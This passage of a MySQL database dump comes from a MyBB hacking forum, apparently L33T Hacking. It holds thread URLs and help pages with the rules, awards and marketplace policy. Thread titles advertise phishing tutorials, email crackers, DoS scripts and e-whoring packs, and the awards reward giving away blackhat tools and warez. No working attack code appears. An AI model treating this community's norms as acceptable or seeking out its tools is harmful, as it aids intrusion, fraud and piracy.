'234', 'showthread.php?Free-E-Whoring-packs-website-plus-free-PORN'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '232', 'showthread.php?Triple-H'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '238', 'showthread.php?Ban-the-user-above-you'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '266', 'showthread.php?Win-a-Free-Netflix-Account'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '268', 'showthread.php?Suggestion-Forum-News-Section'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '277', 'showthread.php?Any-phreaking-tutorials'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '283', 'showthread.php?Proxy-List-August-2012-Working'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '287', 'showthread.php?steam-account'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '295', 'showthread.php?ebook-Crypter-Blueprint'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '302', 'showthread.php?Java-DoS-Script'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '311', 'showthread.php?UploadNSell-Scraper'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '314', 'showthread.php?Testing-Staff-Message-MyCode'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '313', 'showthread.php?VB-net-Source-PayPal-Cash-System'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '318', 'showthread.php?Want-to-Earn-Money-by-doing-Nothing'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '321', 'showthread.php?Full-Signature-Tutorial'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '326', 'showthread.php?TUT-Free-Restaurant-Gift-Cards'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '328', 'showthread.php?Mod-Notice-in-threads'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '331', 'showthread.php?New-Rules-and-Instructions-v-2'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '332', 'showthread.php?Hello'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '333', 'showthread.php?Six-Degrees-Made-For-Adult-Students'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '335', 'showthread.php?ESET-NOD32-Antivirus-ESET-Smart-Security-Username-And-Password-4-sept-2012'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '339', 'showthread.php?Req-Torrentleech-invite'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '345', 'showthread.php?Need-userbar-Gamers'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '347', 'showthread.php?Junk-Warning'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '348', 'showthread.php?Brazzers-Cracker'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '349', 'showthread.php?Everyone-Read'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '350', 'showthread.php?WESTi-s-Email-Cracker-Crack-Any-E-Mail-Hotmail-Yahoo-Gmail'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '351', 'showthread.php?Phishing-Tutorial'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '352', 'showthread.php?How-to-Take-Down-Websites-Effectively-Proof'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '353', 'showthread.php?Complete-Guide-How-to-crack-All-Sites-Hosting-With-Apex-Complete-Guide'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '354', 'showthread.php?MBAM-Self-Help-Removal-Tutorials'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '359', 'showthread.php?Easiest-Hacking-Technique-EVER'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '361', 'showthread.php?Xbox-live-Code-1-Month'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '363', 'showthread.php?Top-10-songs-of-September-2012'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '257', 'showthread.php?Nice-Video-Edit'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '83', 'rixxon'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '64', 'vlajke'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '99', 'Lukieboiz'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '365', 'showthread.php?HAHA-SHIT-CAN-WORK'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '28', 'debojyotip'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_groupleaders`; CREATE TABLE `mybb_groupleaders` ( `lid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `gid` smallint(5) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `canmanagemembers` int(1) NOT NULL DEFAULT '0', `canmanagerequests` int(1) NOT NULL DEFAULT '0', PRIMARY KEY (`lid`) ) ENGINE=MyISAM AUTO_INCREMENT=12 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_groupleaders` WRITE; INSERT INTO `mybb_groupleaders` (`lid`, `gid`, `uid`, `canmanagemembers`, `canmanagerequests`) VALUES ('5', '12', '232', '1', '1'); INSERT INTO `mybb_groupleaders` (`lid`, `gid`, `uid`, `canmanagemembers`, `canmanagerequests`) VALUES ('7', '13', '62', '1', '1'); INSERT INTO `mybb_groupleaders` (`lid`, `gid`, `uid`, `canmanagemembers`, `canmanagerequests`) VALUES ('4', '17', '61', '1', '1'); INSERT INTO `mybb_groupleaders` (`lid`, `gid`, `uid`, `canmanagemembers`, `canmanagerequests`) VALUES ('10', '20', '100', '1', '1'); INSERT INTO `mybb_groupleaders` (`lid`, `gid`, `uid`, `canmanagemembers`, `canmanagerequests`) VALUES ('11', '21', '228', '1', '1'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_helpdocs`; CREATE TABLE `mybb_helpdocs` ( `hid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `sid` smallint(5) unsigned NOT NULL DEFAULT '0', `name` varchar(120) NOT NULL DEFAULT '', `description` text NOT NULL, `document` text NOT NULL, `usetranslation` int(1) NOT NULL DEFAULT '0', `enabled` int(1) NOT NULL DEFAULT '0', `disporder` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`hid`) ) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_helpdocs` WRITE; INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('1', '1', 'User Registration', 'Perks and privileges to user registration.', 'Some parts of this forum may require you to be logged in and registered. Registration is free and takes a few minutes to complete.

You are encouraged to register; once you register you will be able to post messages, set your own preferences, and maintain a profile.

Some of the features that generally require registration are subscriptions, changing of styles, accessing of your Personal Pad (simple notepad) and emailing forum members.', '1', '1', '1'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('2', '1', 'Updating Profile', 'Changing your data currently on record.', 'At some point during your stay, you may decide you need to update some information such as your instant messenger information, your password, or perhaps you need to change your email address. You may change any of this information from your user control panel. To access this control panel, simply click on the link in the upper right hand corner of most any page entitled \"user cp\". From there, simply choose \"Edit Profile\" and change or update any desired items, then proceed to click the submit button located at the bottom of the page for changes to take effect.', '1', '1', '2'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('3', '1', 'Use of Cookies on myBB', 'myBB uses cookies to store certain information about your registration.', 'myBulletinBoard makes use of cookies to store your login information if you are registered, and your last visit if you are not.

Cookies are small text documents stored on your computer; the cookies set by this forum can only be used on this website and pose no security risk.

Cookies on this forum also track the specific topics you have read and when you last read them.

To clear all cookies set by this forum, you can click here.', '1', '1', '3'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('4', '1', 'Logging In and Out', 'How to login and log out.', 'When you login, you set a cookie on your machine so that you can browse the forums without having to enter in your username and password each time. Logging out clears that cookie to ensure nobody else can browse the forum as you.

To login, simply click the login link at the top right hand corner of the forum. To log out, click the log out link in the same place. In the event you cannot log out, clearing cookies on your machine will take the same effect.', '1', '1', '4'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('5', '2', 'Posting a New Topic', 'Starting a new thread in a forum.', 'When you go to a forum you are interested in and you wish to create a new topic (or thread), simply choose the button at the top and bottom of the forums entitled \"New topic\". Please take note that you may not have permission to post a new topic in every forum as your administrator may have restricted posting in that forum to staff or archived the forum entirely.', '1', '1', '1'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('6', '2', 'Posting a Reply', 'Replying to a topic within a forum.', 'During the course of your visit, you may encounter a thread to which you would like to make a reply. To do so, simply click the \"Post reply\" button at the bottom or top of the thread. Please take note that your administrator may have restricted posting to certain individuals in that particular forum.

Additionally, a moderator of a forum may have closed a thread meaning that users cannot reply to it. There is no way for a user to open such a thread without the help of a moderator or administrator.', '1', '1', '2'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('7', '2', 'MyCode', 'Learn how to use MyCode to enhance your posts.', 'You can use MyCode, a simplified version of HTML, in your posts to create certain effects.

[spoiler]text here[/spoiler]

[hl=COLOR]Highlight text[/hl]

[lock]Content is hidden til you post[/lock]
Demo: http://l33thacking.net/thread-1031-post-5957.html


Want someone to do a google search but they are lazy?

[gsearch]L33T Hacking[/gsearch]


[b]This text is bold[/b]
   This text is bold

[i]This text is italicized[/i]
   This text is italicized

[u]This text is underlined[/u]
   This text is underlined


[url]http://www.example.com/[/url]
   http://www.example.com/

[url=http://www.example.com/]Example.com[/url]
   Example.com

[email]example@example.com[/email]
   example@example.com

[email=example@example.com]E-mail Me![/email]
   E-mail Me!

[email=example@example.com?subject=spam]E-mail with subject[/email]
   E-mail with subject


[quote]Quoted text will be here[/quote]
   Quoted text will be here

[code]Text with preserved formatting[/code]
   Text with preserved formatting


[img]http://www.php.net/images/php.gif[/img]
   

[img=50x50]http://www.php.net/images/php.gif[/img]
   


[color=red]This text is red[/color]
   This text is red

[size=3]This text is size 3[/size]
   This text is size 3

[font=Tahoma]This font is Tahoma[/font]
   This font is Tahoma


[align=center]This is centered[/align]

This is centered

[align=right]This is right-aligned[/align]

This is right-aligned


[list]
[*]List Item #1
[*]List Item #2
[*]List Item #3
[/list]

You can make an ordered list by using [list=1] for a numbered, and [list=a] for an alphabetical list.', '0', '1', '3'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('8', '3', 'Rules', 'L33THacking Rules and Regulations', '

Official LH rules

1. We do not allow Post here and PM me threads. Use the lock code to hide download links.

2. No short, low quality posts like \"bump\", \"lol\", \"roflmao\", \"thanks\", \"Troll\" and any repeated characters to defeat the min character count. Posts written completely in another language will also be considered LQP.

3. Don\'t attempt to infect members with any kind of virus, RATs, Keyloggers and trojans.

4. You are not allowed to post dumps. DOX informations are highly recommended to not be posted unless they are approved by an Admin.

5. You cannot ask for or offer reputation in posts, signatures, or PM. This includes encouragement like \"reputation is appreciated\".

6. No adult images, adult links, or adult account trading.

7. Multiple accounts will not be allowed unless you are reporting your original account as hacked. Ban evading will result in the permanent closing of your old account and new accounts. No exceptions.

8. Advertising of competing sites is not allowed. This refers to hacking sites related to LH. Websites without forums or forums unrelated to hacking are acceptable. Advertising includes anywhere on L33T Hacking board.

9. No posting of fake programs.

10. No threads, posts or PMs on donations. We do not allow loan requests.

11. No political or religious expression in your profile. This includes user titles, signatures, and avatars.

12. You are not allowed to keep site goals in your signature, avatar, usertitle or anywhere on L33T Hacking.

13. We would not allow discussions or distribution of Havij or any similar program, we would like to encourage manual SQL Injection rather than using automatic programs (Skid). Programs include vulnerability scanners, auto-exploiters or anything of this sort.

14. Members are not allowed to engage in threatening behavior toward other members. This includes flaming. Threats to steal accounts, swat or dox would not be tolerated. Any onsite material including posts and PMs.

15. We recommend to use the [lock] mycode to hide download links however we do not allow the [lock] mycode in the Upgraded tab. For more information Click Here', '0', '1', '1'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('9', '3', 'When to contact staff', 'Quick FAQs on when to contact a staff member. ', '
I want to report a post, can I PM the staff member?
No, you may not. Click on the report post button on the post of the user and choose the category that it is in.

Someone negative repped me, can I contact a staff member to remove it?
No, but if you believe that you don\'t deserve the rep and you are being rep abused then feel free to contact Apathy.

I\'m bored, can I contact a staff member to chill?
Well you can but it depends on the staff member. If he is a busy person then they might repfuck you.

I some questions, can I contact a staff member?
Yes you may, but you can post in our Announcements, Feedback, Bugs and Suggestions section.

I bought an upgrade, but haven\'t been upgraded yet
The upgrades take up to 48 hours, if you haven\'t been upgraded then let any admin know about it.

I want to report a staff member
Don\'t be afraid, feel free to send t3h jok3r also please provide as much REAL proof as possible.

Can I ask an admin to give me an award?
No awards are given at our discretion.

Can I PM them a suggestion?
No, we have a suggestions forum for a reason.

Staff Roles

Admins :- You can contact them regarding anything.
  • Apathy :- He is in-charge or reputation abuse and awards.
  • T3h Jok3r :- In-charge of upgrades, help documents and everything else not listed for other staff.
  • LOOKING, PM JOKER FOR NOW :- In-charge of stolen accounts, stickies and issues regarding bans.

  • Staff :- They handle all kinds of reports and also look after the forums. They also answer your questions and guide you around LH. They can give out warnings and moderate all the forums.

    Moderators :- They moderate specific forums, but can\'t give out warnings. They are here to help you. They can only handle reports made in their forums.', '0', '1', '2'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('10', '3', 'Warning System', 'The Warning System Explained.', '
    Why was I given a warning?
    The answer to your question(s) will be the type of warning, receive a PM or we will recommend you to know the Help Documents.

    Can I get my warning removed?
    No, we will not remove your warning and if you plan to bribing to get your warning remove then please note that we will NOT take this matter lightly.

    I believe I was given a warning that I don\'t deserve.
    Contact the staff member who issued the warning regarding your problem.

    Do warnings ever expire?
    Yes they do, only some bans are permanent.

    Warning Reasons and Points
    Adult Content (+20 points)
    Cross Posting (+20 points)
    Disallowed Blackhat Activity (+30 points)
    Donation Begging (+10 points)
    Infected download or link (+25 points)
    Leeching (+20 points)
    Nonsense (+10 points)
    Off topic or Unrelated (+10 points)
    Personal Data (+15 points)
    Profile Violation (+15 points)
    Reputation Abuse (+25 points)
    SPAM (+20 points)
    Threat or Harassment (+40 points)
    Wrong Forum (+15 points)

    ', '0', '1', '4'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('11', '3', 'Profile policies, violations and rules.', 'Profile policies and other rules regarding your profile.', '
    Basic Rules List
    1. You cannot buy, sell, trade, or share your account.
    2. We do not allow multiple accounts except a UID_TEMP account as explained in our \"Stolen and Lost LH Accounts\" help doc.
    3. No religious, nationality, or political expression in your profile.
    4. No adult images such as nudity.
    5. You cannot link to competing sites. We consider competing sites to be anything that has topics similar to those under our Hacking tab.
    6. No image rotation or scripts images (ip grabber) for your avatar or signature.
    7. No site goals such as \"1000 Posts\" or \"100 Reps\".
    8. All text must be in English or readable as English in the case of fancy unicode.
    9. You cannot impersonate staff, admins, or mentors.
    10. No linking to shock sites.

    I received a \"Profile Violation\" warning but it doesn\'t say anything else. What was it for?
    If you did not receive a PM with your warning then I don\'t know. But if you read this entire Help Doc, you should be able to figure it out. Just make sure to understand our policies to avoid future warnings.

    What is the maximum signature image size?
    Signature images can be no wider than 650px, no taller than 200px, and no bigger than 500k.

    What if my signature only has text? Is there a limit?
    We don\'t enforce an exact size with text. Our settings are 255 characters including mycode. Do not enlarge your signature with enormous text or lots of spaces. Just be reasonable with your sig size.

    Why not extend the max characters or at least discount the mycode for signatures?
    This is our limit. You\'ll have to deal with it. We are not going to extend it or change how it works. Everyone has the same limitations on LH.

    Why can\'t I upload an avatar?
    LH has some default avatars in the gallery. Upgraded members are the only ones who can use avatar uploads. If you\'ve received a no permission page, it\'s likely you\'re a regular member attempting to upload. Use the avatar URL which means you must have the image hosted elsewhere. Please make sure the remote avatar is within site guidelines.

    What\'s the max avatar size for remote avatars?
    Remote avatars are resized to fit on the postbit but MyBB does not check the K size of the file. However we enforce a 70k max size. Anyone using a higher sized avatar will be warned and their avatar removed.

    Can I use the same avatar or signature as a staff member?
    No you may not. Impersonating staff with your username, usertitle, signature, or avatar is going to be a reason to ban you. We take this really seriously. The potential for abuse is enormous so it will not be allowed even as a joke.

    What are the rules for usertitles?
    Basically the same as all the other rules for a profile. Don\'t impersonate staff, flame members, use religious or political symbols and don\'t advertise a competing forum.

    I have a forum or am a member of one can I advertise it in my profile?
    LH has a strict rule about advertising competing sites. We consider competing sites any forum with subjects or forum categories that are similar to ones under our Hacking tab. Advertising is not allowed in profiles.

    Can I express my religion, nationality, or political affiliation in my profile?
    No you can\'t. This was a more recent addition to our rules. While we\'d like to think LH is full of open-minded individuals that respect each other the reality is that it\'s not. Having religion or political expression in your profile will invite flames and negative reputations. That\'s something we want to avoid. We have a forum for debating called \"Science, Religion, Philosophy, and Politics\".

    It seems outrageous you don\'t allow religion or politics on LH. Why is that?
    LH is not the place for you to spread your faith or recruit for your cause. It was never designed for such discussion. We have an international community and we want all members to respect each other for who they are not what they believe in or represent. We wish the world was a respectful happy place but it\'s not. We are not going to allow strife to be part of LH.

    Can I have sexy pics in my profile?
    To a point you can. We do not allow nudity and if staff feels your image is too overt, it could be removed and you might receive a warning.

    Someone is flaming me or calling me a scammer in their signature. What can I do?
    Contact staff please. We\'ll look into it.

    Can I have site goals in my sig?
    Goals we don\'t allow include reps, groups, posts, or upgrades.

    Can I have referral links in my sig? Stuff like adf.ly?
    Yes this is allowed on LH. Be aware Sharecash and some other services are censored.

    Can I have donation request or link in my signature?
    Yes you can have them in your signature but we have rules about threads/posts for begging. If you want a donation begging signature, go for it.

    I don\'t see where my MSN, AIM, or email display in my profile. Can I put them in my signature?
    Yes you can but we advise you do not. This site has some malicious users that might use your personal information in ways you don\'t expect. You can be targeted very easily by posting any private data about yourself on this site. So be careful if you do.

    Can I put fake links or shock site links in my signature?
    No you cannot. We won\'t allow deceiving links such as fake spoilers links or links disguised in order to trick members into visiting shock sites. Use some common sense please.

    Are we allowed dynamic sigs such as counters or image rotators?
    No. You\'re not allowed to use dynamic sigs on LH. They can be abused and normally slow the loading of pages. So we ask that you do not use dynamic images in your sig. This rule also applies to avatars.

    I was rep fucked by staff. Can I complain about it in my profile?
    You are not allowed to rep fuck complain anywhere on your profile or even in posts. You will be banned for one month if you do.

    ', '0', '1', '5'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('12', '3', 'Awards System Explained', 'How are awards work out and how to obtain them.', '
    Staff can\'t add awards to themselves!
    Staff members can only give awards to other people. Staff can\'t give themselves awards without having an admins permissions.

    How to activate an award?
    Usercp>Achivements>Select awards>Show in postbit

    How to obtain an award?
    Awards are given at Staffs discretion. Please do not PM us saying why you deserve a specific award. You are only allowed to PM about some awards which I will discuss below.

    Who is in-charge of the awards?
    At the moment it\'s NXK but feel free to contact t3h jok3r regarding an award.

    How are allowed to give out awards?
    Admins can give out any kind of award. Staff can give out some awards that they have access to.

    I want to reorganize my awards list!
    Sorry, but we do not reorganize your awards list to your liking.

    Can I buy an award?
    You can\'t buy any awards. The donation awards are awards for those who support LH by donating money, we do not position it as a \"buy in\" award.

    Do only upgraded members get awards?
    No, regular members can get awards too.

    What will happen if I ask for an award?
    You might get repfucked or your request will be ignored. The action depends on the staff member and remember you have been warned.

    AWARDS


    The following awards are granted automatically.

    Cheers on 100 : User has reached 100 posts
    Posting Freak : This user has 500+ posts
    Spammer : Given to those who have 1,000 posts.
    10 Threads : Self-explanatory
    Contributor : Granted to those who have reached 100 threads.
    No life : This member has no life and is too addicted to LH.


    The following awards are given manually by staff.

    YouTube : Create a YouTube video advertising LH, include your UID in the video.
    Ass Kisser : Self-explanatory
    Painter : Good at graphic designing
    Music Fan : Post valid proof showing how much you love listening to music.
    Gold Brick : Do a lot of great program and ebook giveaways.
    Silver Brick : Post a original and unique tutorial
    Swag : Where the polos at? (Gotta be flee son)
    Gamer : This one looks easy but it\'s hard to get. Beat a Mod or post your prestige etc.
    Sticky : Got a thread stickied.
    Dangerous Programmar : Create and give away 3+ blackhat tools and/or programs for free on LH. This excludes Chat Spammer, Doxer and resolver.
    Angel: Has done well helping out others
    Referrer : You have referred 10 or more members. All must be activated.
    SE Legend : Proven SE Legend or SE a product for LH staff.


    Awards given by Admins only.

    MOTM : Member of the Month
    Diamond : It\'s an award for those who are HQ members and have contributed a lot to the community also helped a lot of members.
    Thinker : Has made an excellent suggestion to help improve LH.
    Genius : If you just have too much knowledge.
    Advanced BH contributor : Has shared a lot of warez or premium accounts.
    Reporter : Has reported a lot of SPAM on LH.
    Elite : Special award to signify Elite status.
    Blackhat : Proven Black hatters.


    Donations awards are given by Jok3r only.

    GOOD LUCK!
    ', '0', '1', '6'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('13', '3', 'Disallowed Blackhat Activity', 'These are various additional rules restricting certain blackhat hacking activity on LH', 'These are the blackhat hacking activities that we do not allow as part of our discussions here on L33THacking. We don\'t explain the logic behind each forbidden activity, but it\'s somewhere between morality, ethics, and legality for each one. We ask that members do not participate in discussion around the following topics. If you\'ve received a warning and been asked to read this, please do so carefully.

    Dumps
    We do allow dumps in the VIP sections, but we do not allow dumps on online banking accounts, online stores (EX: Amazon, Ebay) and Facebook.

    Financial Fraud
    We take this very seriously. We do not allow posts in relation to these subjects. Selling information of any sort that has been stolen, in any way, is against the rules. Any information posted that\'s designed to commit financial fraud may result in the immediate closing of your account.

    Gift Cards and Virtual Bank Accounts (VBA)
    We do allow discussions on VCC but not on Virtual Bank Accounts. VCC discussions are only allowed in the Social Engineering section. We do not allow discussions on Gift Cards neither you are allowed to sell, trade or buy Gift Cards.

    Identity Theft
    This is another topic we feel is purely criminal in nature and we won\'t allow that here. Topics on stealing identities will be removed immediately.

    Paypal Fraud
    With PP fraud rampant in the hacker community we feel it\'s our duty to take a stand on this one. We will not allow discussion on selling of paypal accounts, stealing accounts, or verifying accounts with false information. Basically if you\'re doing something against the TOS of paypal, you\'re breaking a rule here.

    Zeus and SpyEye Botnets
    These botnets have the intended goal of stealing financial data from those who get infected. For this reason any discussions on these botnets will be closed and the member warned.

    Amazon/Ebay Account Trading
    Any buying, selling, or trading of Ebay/Amazon accounts is not allowed due to the fact that these accounts have credit cards and personal information attached.

    Fake Programs
    We do not allow the distribution of fake programs that are infected. Nor do we allow the discussion of fake program creation.

    Deepweb Discussion
    Deepweb is a phrase to describe hidden websites on the internet that are often, but not always, directly related to illegal activity such as child porn, carding, hitmen, and other very illicit material. As such we\'re not going to allow it here. Not even the slightest discussion of the deepweb will be allowed.

    ', '0', '1', '3'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('17', '1', 'How to become Staff?', 'General Information on becoming staff.', '
    How do I become a Staff member?
    There are no set requirements. All you have to do is be active, be HQ, report spam and contribute to the community.

    When I become Staff can I abuse my privileges?
    No, you may not abuse your privileges. You will get banned and removed from Staff.

    Someone asked me for a specific users personal data, should I give it to them?
    No, tell them to PM the founder for further details.

    Can I become admin?
    No and we recommend you not to ever ask any mod or Staff to become an Admin because you will get repfucked and banned.

    Are staff paid?
    No! Staff, Mods and neither the Admins are paid to moderate LH. This is a complete voluntary job.

    Can I moderate a specific section?
    We do have sectional mods but once again Admins are the one who pick new staff.

    ', '0', '1', '0'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('14', '4', 'Marketplace Violations', 'Things that will violate LH rules and regulations of the marketplace.', '
    Can I sell for other members?
    No you may not sell content for other members. Ban evaders, neg repped members or non-upgraded members are not allowed to use proxy on others account and sell.

    No offsite vouches
    All vouches on a thread should include vouches from LH Members on LH. You may not use vouches from other websites. Each thread must provide at least 1 vouch copy.
    ', '0', '1', '1'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('15', '4', 'Marketplace, Scams and Safe Trading', 'Complete assistance with the Marketplace. ', '
    Rules for the Marketplace
    1. L33T Hacking will not be held responsible for deals made by members.
    2. All the trades on L33T Hacking should be made in the Marketplace section, regardless of content.
    3. We do not allow deals which are associated with credit card, bank, or identity fraud, nor any other type of illegal stock.
    4. The official rules of the forum still apply.

    Scam Reporting

    The Scam Reports section is designed to alert other members of scammers. It also can serve to help resolve an issue between members. We can\'t get your money back or force a member to complete a deal. Do not PM staff. Our staff on occasion will ban a scammer, if the evidence is on site and apparent. If you got scammed, we would appreciate it if you report the scammer by making a thread in the scam reports section, with the following content:
    1. Link to the scammers profile. This is to prevent confusion if a username change occurs.
    2. Link to the thread in question if it exists, where you may have been scammed.
    3. Search Scam Reports area for any existing threads with the scammer. Search by username and also uid. If everyone adds the users profile then UID will be very effective. Include such threads if found.
    4. Post any images/screenshots (or videos perhaps) that you can provide as evidence of the scam. Include short explanation for every image.
    ', '0', '1', '2'); INSERT INTO `mybb_helpdocs` (`hid`, `sid`, `name`, `description`, `document`, `usetranslation`, `enabled`, `disporder`) VALUES ('16', '1', 'Legal Policies and Legal Disclaimer ', 'Here you can understand the policy of LH', '
    Privacy Statement


    Our Commitment To Privacy

    Your privacy is important to us. To better protect your privacy we provide this notice explaining our online information practices and the choices you can make about the way your information is collected and used. To make this notice easy to find, we make it available from every page where personally identifiable information may be requested.

    The Information We Collect:

    This notice applies to all information collected or submitted on the L33T Hacking website. On some pages, you can order products, make requests, and register to receive materials. The types of personal information collected at these pages are:

    Email address
    IP information

    The Way We Use Information

    We do not share this information with outside parties except to the extent necessary when the law requires us to comply.
    We use email addresses to answer the emails we receive, to verify upon registration, to send opt-in only contacts such as thread subscriptions and PM notifications. Such addresses are not used for any other purpose and are not shared with outside parties.
    We use non-identifying and aggregate information to better design our website and to share with advertisers. For example, we may tell an advertiser that X number of individuals visited a certain area on our website, or that Y number of men and Z number of women filled out our registration form, but we would not disclose anything that could be used to identify those individuals.

    Advertising

    We also use third party advertisements support our site. Some of these advertisers may use technology such as cookies and web beacons when they advertise on our site, which will also send these advertisers (such as Google through the Google AdSense program) information including your IP address, your ISP , the browser you used to visit our site, and in some cases, whether you have Flash installed. This is generally used for geotargeting purposes (showing New York real estate ads to someone in New York, for example), showing certain ads based on specific sites visited or provide advertisements about goods and services of interest to you (such as showing cooking ads to someone who frequents cooking sites). If you would like more information about this practice and to know your choices about not having this information used by these companies, please see: http://www.networkadvertising.org/managing/op_out

    Our website contains some affiliate marketing links, which means we get paid commission on sales of those products or services we write about. Our editorial content is not influenced by advertisers or affiliate partnerships. We use a 3rd Party to enable these affiliate partnerships. You can read their Privacy Policy and find more information on the cookies they use.
    Finally, we never use or share the personally identifiable information provided to us online in ways unrelated to the ones described above without also providing you an opportunity to opt-out or otherwise prohibit such unrelated uses.

    Our Commitment To Data Security

    To prevent unauthorized access, maintain data accuracy, and ensure the correct use of information, we have put in place appropriate physical, electronic, and managerial procedures to safeguard and secure the information we collect online.

    Our Commitment To Children\'s Privacy

    Protecting the privacy of the very young is especially important. For that reason, we never collect or maintain information at our website from those we actually know are under 14, and no part of our website is structured to attract anyone under 14. Upon registration all children under 14 are denied.

    How To Contact Us

    Should you have other questions or concerns about these privacy policies, please contact us from our contact form.

    Disclaimer


    No advice

    This website contains general information about legal matters. The information is not advice, and should not be treated as such.

    No warranties

    This website is provided “as is” without any representations or warranties, express or implied. L33THacking makes no representations or warranties in relation to this website or the information and materials provided on this website. Without prejudice to the generality of the foregoing paragraph, L33THacking does not warrant that:
  • this website will be constantly available, or available at all; or
  • the information on this website is complete, true, accurate or non-misleading.

